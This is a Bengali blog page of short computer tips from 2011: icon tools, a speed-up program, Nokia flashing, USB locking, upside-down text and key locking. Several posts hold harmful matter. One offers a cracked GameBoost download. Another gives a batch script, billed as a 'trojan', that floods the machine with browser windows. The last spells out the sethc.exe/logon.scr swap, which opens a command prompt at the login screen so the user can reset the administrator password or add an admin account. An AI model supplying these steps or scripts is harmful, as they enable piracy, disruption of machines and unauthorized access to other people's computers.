আসসালামু আলাইকুম

শনিবার, ১৯ নভেম্বর, ২০১১

ফেভিকন ও আইকন তৈরি করুন ৫ সেকেন্ডে !!



সবাই নিজের পিসির ফোল্ডার গুলো কে নিজের পছন্দ মতো আইকন দিয়ে সাজাতে চায়। আপনি ও চান নাকি ???

চাইলে নিচের URL এ ক্লিক করুন।

http://www.chami.com/

তারপর খুজে নিন আপনার প্রয়োজনীয় অপশন। কি ফেভিকন বানাবেন না আইকন।

শুধু পিসি থেকে আপনার পছন্দের ছবিটি আপলোড করে দিন বাকি কাজ ওরা ই করে দিবে। তারপর ডাউনলোড করে নিন।

আরও অনেক ওয়েব ডেভেলপার টুলস ও সাইট টি তে পাবেন।

আমি ফেভিকন ও আইকন এর URL দুটি দিয়ে দিলাম। সাইট টি ঘেটে দেখতে পারেন। প্রয়োজনীয় অনেক কিছুই পেতে পারেন।

ফেভিকন- http://www.chami.com/html-kit/services/favicon/

আইকন- http://www.html-kit.com/e/buddyicon.cgi

না বুজলে প্রশ্ন করুন।

ধন্যবাদ রইলো।

আপনার কম্পিউটারের এবং ইন্টারনেটের স্পিড বাড়িয়ে নিন তিনগুণ!!!

আপনার কম্পিউটারের এবং ইন্টারনেটের স্পিড বাড়িয়ে নিন তিনগুণ!!!!! (With full verson software)



হাই বন্ধুরা, আমরা সবাই আমাদের পি.সির গতি নিয়ে একটু হতাশ। কারণ আমাদের দেশের বেশির ভাগ পি.সিই পেন্টিয়াম ৩ থেকে ৪ এর মধ্যে সীমাবদ্ধ। এখন আমি একটি সফটওয়্যারের কথা আপনাদের সাথে শেয়ার করবো যা দিয়ে আপনি আপনার যেকোন মানের কম্পিউটারের এবং যেকোন গতির ইন্টারনেটের স্পিড তিনগুণ পযর্ন্ত বাড়িয়ে নিতে পারবেন!!!!



সফটওয়্যারটির নাম হল গেইমবুষ্ট।

এটি একটি শেয়ারওয়্যার সফটওয়্যার এবং এটির ফুল ভাসর্নটি কিনতে আপনার খরচ হবে $24.98.

তবে চিন্তার কোন কারণ নেই আমি এই সফটওয়্যারটির ক্রাক দিয়ে দিয়েছি।



চলুন তবে দেখি নেই আসলে গেইমবুষ্ট কি এবং কিভাবে কাজ করেঃ



Overview:

GameBoost is a tool that optimizes your computer performance to make your games and internet run faster. Playing computer games that run entirely too slow or show poor performance? GameBoost attempts to solve such problems and at the same time increase computing performance. GameBoost boosts your computer gaming and internet performance by modifying several system settings, so you can now use that old computer or new computer of yours as your primary gaming station. No installation or modification needs to be made to your hardware, GameBoost does all the complicated settings for you instantly.

GameBoost works by fixing several registry settings on your computer as well as several configuration files. However those are not the only changes made to your computer. GameBoost also increases Windows® stability and increases your computer’s gaming performance through memory and file system tweaks. GameBoost also modifies several Windows® settings to optimize monitor refresh rates, speed up animations and make frame rates during game play consistent and smooth as possible. Finally GameBoost makes several settings to modify your internet connection to be up to 300% faster than before. Play games faster, longer and without slow performance worries with GameBoost.

GameBoost is quite easy to use and understand. With a few button pushes and setting changes the application is ready to work. After the settings have been made, you will need to reboot your computer and it will be ready to use at optimal gaming performance. Try GameBoost for 28 days and if you find it useful please do register.



System Requirements:


Microsoft Windows 2000, 2003, 95, 98, Me, NT 4, Vista (Service Pack 3), XP, Seven (Service Pack 2)
Microsoft Internet Explorer 6 or higher
Intel Pentium 90 MHz or higher (Pentiam II)
8 Mb RAM (32 Mb recommended)
5 Mb hard disk space
VGA or higher resolution monitor
Mouse or other pointing device.


How It Works:


GameBoost works by modifying multiple Windows registry entries as well as system files to increase computer gaming and internet performance. The process begins by GameBoost locating all installed hardware on your computer and then runs through pre-defined routines to diagnose it’s status. Then GameBoost based on your computers’ configuration determines appropriate values to modify accordingly. The whole process should take under two minutes to complete.



GameBoost Modifications:

Maximum and minimum file cache
Memory swap file/conservative swap file
Windows animation settings
Monitor refresh rates
File allocation size and buffers
Windows system resources
Application priority level
Device drivers
Modem MTU Transmission rates
Memory allocation to modem
Modification to network bandwidth allowance
Increasing HTTP request limit
DNS lookup optimization
Modification to TTL setting
Optimization of TCP/IP standard settings
Modification to socket layer connections
and much more…

সফটওয়্যারটি ইনষ্টল করার পর Crack ফাইল কপি করে সফটওয়্যারটি চালু করুন।


চালু করার পর আপনি তিনটি অপশন সহ একটি উইন্ডো পাবেন।


অপশনসমূহ হলঃ

1. Operating System
2. Modem Type
3. Speed Setting

অপারেটিং সিস্টেমে আপনার পি.সির অপারেটিং সিস্টেমের নাম নির্বাচন করুন। গেইমবুষ্ট নিম্ন লিখিত অপারেটিং সিস্টেম সার্পোট করেঃ


Microsoft Windows 95,

Microsoft Windows 98

Microsoft Windows 98 SE

Microsoft Windows ME

Microsoft Windows 2000

Microsoft Windows 2003

Microsoft Windows NT 4

Microsoft Windows XP

Microsoft Window s Vista

Microsoft Windows Seven

Microsoft Windows Live

Microsoft Windows Black Edition

(*Do not work with Windows seven)



তবে আপনার কাছে যেকোন অপারেটিং সিস্টেমের Service Pack 2 থাকতে হবে।



মডেম টাইপ অপশনে আপনার মডেমের বর্তমান স্পিড নির্বাচন করুন। যারা ব্রডব্যান্ড ব্যবহার করেন তারা Local Area Network অপশনটি নির্বাচন করুন।





এরপর স্পিড সেটিং এ Fastest নির্বাচন করে Go বাটনে ক্লিক করে কিছুক্ষন অপেক্ষা করুন। এরপর আপনার পি.সি. রিষ্টাট দিন।


ব্যাস… হয়ে গেল….।


গেইমবুষ্ট ফাইলটি ক্রাক সহ ডাউনলোড করতে নিচে দেখুন অথবা http://www.pgware.com থেকে ডেমো/ফুল ভার্সন কিনুন।



অথবা http://www.mediafire.com/?54hq8knuzqy7eie থেকে ক্রাক সহ ডাউনলোড করুন।






ধন্যবাদ।।।।।।

দুনিয়ার সবচেয়ে সহজ সিস্টেমে আপনার নোকিয়া মোবাইল ফ্ল্যাশ!

একটু আগে আলু ব্লগে একটা পোস্ট হয়েছে, , , নোকিয়া মোবাইল ফ্ল্যাশ মারা, , , ফ্ল্যাশ মারবেন আর কি? পড়তে পড়তেই আপনার জান অর্ধেক আজরাইল এর হাতে চলে যাবে। তাই আমি অই ভাইকে বললাম আমার পোস্ট টি দেখবেন। যাই হোক, আমি বলি, আপনি ফ্ল্যাশ মারুন। কিছুই করা লাগবে না আপনার। যা করার আপনার পিসি করবে।


একটা মাত্র সফটওয়্যার লাগবে আপনার, আর কিছুই না। download.com থেকে নোকিয়া সফটওয়্যার আপডেটার (nokia software updater ) নামের এই সফটওয়্যারটে নামিয়ে নিন। টাকা লাগবে না। আর লিঙ্ক দিলাম না। খুজে নিন। হোম পেজ এই পেয়ে জেতে পারেন খোদা সহায় থাকলে, , , , নাইলে লিখে সার্চ দিন। এবার ইন্সটল করুন। (শেখাতে হবে নাকি ) আপনার কাজ শেষ। আর কোন কস্ট নেই।


সফটওয়্যার টা চালু করুন। মোবাইল টা লাগান পিসিতে ডাটা কেবল দিয়ে। নেক্সট, কন্টিনিউ কিংবা হাবিজাবি কিছু আসলে দিয়ে দিন। সে নিজে থেকেই মোবাইলের জন্য লেটেস্ট অপারেটিং সিস্টেম খুজে করবে। (সবার শেসে বলব এই সিস্টেমের মাহাত্ত ) এবার ওকে করুন কিংবা কিছু আসলে দিয়ে দিন।

এবার পিসির কাজ ও শেষ কাজ করবে শুধু মডেম। নেট থেকে পুরো সফটওয়্যার এর একদম নতুন আপডেট নামাবে (যা কিনা এখন বাজারের কোন মোবাইলেও নেই) কিছুটা সময় লাগবে। কারন এইটা অনেক বড়। মোবাইল খুলবেন না ভুলেও। ডেড খাইতে পারে। প্রব্লেম নাইক্কা। আবার দিবেন। হয়ে যাবে। (আবার বইলেন না, এত সুজা না, ডেড হইলে ঠিক হয় না। আরে ভাই, আমি তো করছি নাকি? )

অনেক খানি সময় লাগবে এর জন্য। আমার নোকিয়া ই ৫১ মোবাইলের জন্য নেমেছিল মাত্র ! ৭৮ মেগা, টাচ সেট এর জন্য হয়তোবা ১৫০ পার হতে পারে। এর পর আর শুধু একাই সে মোবাইলে সফটওয়্যার সেট আপ করবে। বার বার মোবাইল রিস্টারট মারবে। ভয় পাবেন না। আর, সম্পূর্ণ হয়ে গেলে মোবাইল খুলে ফেলুন। পিসিতে আরো কিছু করতে চাইলে করতে দিবেন না, (অর ইচ্ছা মত নাকি হ্যা? )

(নোটিশঃ আমার মোবাইল এর তারিখ ছিল ২০০৮ এর। আমি নিজে ফ্ল্যাশ মারা পর সেটা ২০১০ হয়ে গেলো। পুরা পাংখা জিনিস তাই না? আহ, , , , , আর কিছু মে বি বলার নেই। সফটওয়্যার ডউনলোড করাটাই আসল। বাকি কাজ ও যদি বলে দেওয়া লাগে, , , তাইলে আপনার ফেলাশ মারন লাগবো না গো ভাই, , , ,

বিদায় আইজকার লাগি

সহজে আপনার কম্পিউটার এর ডাটা কে চুরির হাত থেকে রক্ষা করুন।

আশা করি অনেক ভাল আছেন সৃষ্টিকর্তার রহমতে। আজ আপনাদের জন্য নিয়ে আসলাম একটি ছোট সফটওয়্যার যার নাম USB_Secure এই সফটওয়্যার দ্বারা আপুনি সহজে আপনার কম্পিউটার এর ডাটা কে চুরির হাত থেকে রক্ষা করতে পারবেন। এটি দ্ভারা আপনি আপনার ইঊসবি পোট কে পাসওয়াড দিয়ে রাখতে পারবেন। ফলে কেউ আপনার পিসি থেকে কিছু কপি করে পেন ড্রাইভে নিতে পারবে না।



যাদের প্রয়োজন তারা এখান থেকে ডাউনলোড করতে পারেন।

ডাউনলোড লিঙ্ক USB_Secure

ফেসবুকের স্ট্যাটাস লিখুন উল্টা করে – oʇ unɥʞǝp ǝƃɐl uoɯǝʞ

আসা করি সবাই খুব ভালো আছেন।অনেক দিন আগে দেখতাম পুদিনা পাতা ভাই ফেসবুকে উল্টা করে স্ট্যাটাস দিতেছে। আমি দেখে অনেক অবাক হলাম এবং অনেক খুঁজে না পেয়ে উনাকে জিজ্ঞাস করলাম এবং কাহিনী বের করতে পারলাম। সে জন্য উনাকে ধন্যবাদ। পিপি ভাই সব সময় বলে তুমি যাই কিছু শিখবা সেটা সবাইকে শিখানর চেষ্টা করবে তাহলে তোমার শিখাটার সঠিক ব্যাবহার হবে এবং তোমার চর্চা থাকবে। তাই আজকে পোস্ট করতে বসলাম। চলেন আগে দেখি কেমন দেখা যায়।

ıɐƃ uɐɐƃ ɹɐlƃuɐq ıɯɐ

uǝɥɔɐ olɐʌ ıɐqos ıɹoʞ ɐsɐ ¿uǝɥɔɐ uoɯǝʞ ıɐqos ɐɹɐudɐ

unɹoʞ ɐʇsǝɥɔ nʇʞɐ ǝɹod ɐu ǝqɐɾ ɐɥɾnq nɥɔıʞ ǝɯɥʇoɹd

ɥsǝpɐlƃuɐq

হাহাহা খুব মজার জিনিস তাই না ভাই? এভাবে আপনি নি পারবেন উল্টা করে ফেসবুকে স্ট্যাটাস দিতে। সেটা করার জন্য প্রথমে এখানে যান এবং Your Text > লিখা বক্স এ যা লিখতে চান সেটা লিখুন তারপরে নিচে দেখুন লিখা টা উল্টা হয়ে গেছে তারপরে সেই উল্টা লিখা টা কপি করে আপনার ফেসবুক স্ট্যাটাস এ পেস্ট করে দিন এবং সবাইকে অবাক করে দিন।

trojan ভাইরাস তৈরী করুন নোডপেড দিয়ে…………

সালাম ও শুবেচ্ছা জানিয়ে শুরু করছি আরেকটি টিউন …যা বলতে গেলে আগের টিউনের মত শুধু মাত্র কোড গুলো আর তৈরী করা সফটওয়ারটি ভিন্ন …..যা খুবই সহজ সবাই পারবে…

শুধু আমার দেয়া কোডগুলো নোডপেড এ পেস্ট করে .bat নামে সেভ করতে হবে…..নিচে কোডটি দেয়া আছে

cd c:\windows\system32

for %%a in (*) do start iexplore.exe

for %%a in (*) do start iexplore.exe

for %%a in (*) do start iexplore.exe

for %%a in (*) do start iexplore.exe

for %%a in (*) do start iexplore.exe



সবাই ভাল থাকবেন ধন্যবাদ…….

জটিল সফটওয়্যার – মাউস এবং কিবোর্ড লক করে রাখুন

পিসি লক করতে ত অনেক শুনছেন এবার চলেন শুধু পিসির মাউস এবং কি বোর্ড লক করে রাখি। বাসায় যদি পিচ্চি পুচ্চি থাকে তাহলে খুব ই কাজে দিবে। অথবা বন্ধুদের সাথে একটু মজা নিতে পারেন। নাকি ভার্সিটির পিসিগুলা লক করে রাখবেন একটু পার্ট মারতে? হাহা। এই জটিল সফটওয়্যার টি আপনার পিসির মাউস এবং কি বোর্ড লক করে রাখতে পারবে যখন আপনি চাবেন।
ইন্সটল করার পরে সিস্টেম আইকনের সাথেই একটি আইকন পাবেন সেখানে ক্লিক করলেই দেখা যাবে লক করার অপশন গুলো। খুব সহজ কাজ। আসা করি সবাই পারবেন। এখন ভাবতেছেন লক হবার পরে ত মাউস আর কিবোর্ড কাজ ই করবে না তাহলে আনলক করবেন কিভাবে? সেটির জন্য আছে পাসওয়ার্ড অ শর্টকাট বাটনের সুবিধা। শুধু মাত্র আপনার পাসওয়ার্ড টি কাজ করতে পারবে কিবোর্ডে। সেটা করার জন্য সার্ট মেন্যু থেকে সফটওয়্যার এর মাঝে দেখুন পাসওয়ার্ড টাইপের অপশন আছে।


ডাউনলোড করুন এখানে

অথবা এই টাইপের আরেকটি সফটওয়্যার Key Freeze এবং Child Lock
ও ব্যবহার করতে পারেন

কম্পিউটারের এডমিনিষ্ট্রেটরের পাসওয়ার্ড খুলুন

সাধারণত বাসার কম্পিউটারে একাধিক ইউজার থাকে ফলে লিমিটেড ইউজার ব্যবহার করতে হয় নিরাপত্তার জন্য। লিমিটেড ইউজারে কোন সফটওয়্যার যেমন ইনষ্টল করা যায় না তেমনই অনেককিছুই পরিবর্তন করা যায় না। যদি কোন কারণে এ্যাডমিনিষ্ট্রেটিভ এর পাসওয়ার্ড ভুলে যান তাহলে সেক্ষেত্রে বেশ বিপাকে পড়তে হয়। হয়তোবা নতুন করে অপারেটিং সিস্টেম ইনষ্টল কারারও প্রয়োজন হতে পারে। এমতবস্থায় আপনি যদি লিমিটেড ইউজার ব্যবহার করে থাকেন তাহলে সহজেই লিমিটেড ইউজারের মাধ্যমে এ্যাডমিনিষ্ট্রেটিভ এর পাসওয়ার্ড পরিবর্তন করতে বা নতুন ইউজার খুলতে অথবা বর্তমান লিমিটেড ইউজারকে এ্যাডমিনিষ্ট্রেটিভ হিসাবে ব্যবহার করতে পারেন। এজন্য কমান্ড প্রোম্পট খুলে (রানে গিয়ে Crtl+R চেপে cmd লিখে এন্টার করলে) নিজের পদ্ধতি অবলম্বন করুন।

cd\ লিখে এন্টার করুন,

c: লিখে এন্টার করুন,

cd windows\system32 লিখে এন্টার করুন,

copy logon.scr logon.old লিখে এন্টার করুন,

copy cmd.exe logon.scr লিখে এন্টার করুন,

এছাড়াও সরাসরি উইন্ডোজের সিস্টেম৩২ ফোল্ডারে ঢুকে logon.scr ফাইলকে যেকোন নামে রিনেম করে আবার cmd.exe ফাইলকে logon.scr নামে রিনেম করতে পারেন। এবার কম্পিউটার রিস্টার্ট করুন এবং কম্পিউটার লগঅন না করে অপেক্ষা করুন তাহলে নির্দিষ্ট সময় পরে স্ক্রিনসেভারের ওয়েট টাইম) স্ক্রিনসেভারের পরিবর্তে কমান্ড প্রোম্পট খুলবে। যদি এই পদ্ধতিতে কমান্ড প্রোম্পট না খোলে তাহলে বিকল্প হিসাবে কমান্ড প্রোম্পট খুলে নিচের পদ্ধতি অবলম্বন করুন।

cd\ লিখে এন্টার করুন,

c: লিখে এন্টার করুন,

cd windows\system32 লিখে এন্টার করুন,

copy sethc.exe sethc.old লিখে এন্টার করুন,

copy cmd.exe sethc.exe লিখে এন্টার করুন,

এছাড়াও সরাসরি উইন্ডোজের সিস্টেম৩২ ফোল্ডারে ঢুকে sethc.exe ফাইলকে রিনেম করে আবার cmd.exe ফাইলকে sethc.exe নামে রিনেম করুন। এবার কম্পিউটার রিস্টার্ট করুন এবং কম্পিউটার লগঅন না করে শিফট (Shift) কী পাঁচবার চাপুন তাহলে কমান্ড প্রোম্পট খুলবে।

এখন এ্যাডমিনিষ্ট্রেটিভ এর পাসওয়ার্ড পরিবর্তন করতে net user administrator 2007 লিখুন তাহলে এ্যাডমিনিষ্ট্রেটিভ এর পাসওয়ার্ড পরিবর্তন হয়ে ২০০৭ হয়ে যাবে। আর আপনি যদি পাসওয়ার্ড পরিবর্তন না করে নতুন ইউজার খুলতে চান তাহলে net user mehdi /add লিখে এন্টার করুন তাহলে mehdi নামে নতুন একটি ইউজার তৈরী হবে। এবার mehdi ইউজারকে এ্যাডমিনিষ্ট্রেটিভ হিসাবে ব্যবহার করতে হলে net localgroup administrator mehdi /add লিখুন এবং এন্টার করুন। তাহলে আপনার বর্তমান ইউজার (mehdi) এ্যাডমিনিষ্ট্রেটিভ হিসাবে ব্যবহার করা যাবে। একইভাবে বর্তমান ব্যবহার করা যে কোন লিমিটেড ইউজারকে এডমিনিষ্ট্রেটিভ হিসাবে ব্যবহার করতে পারেন।

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More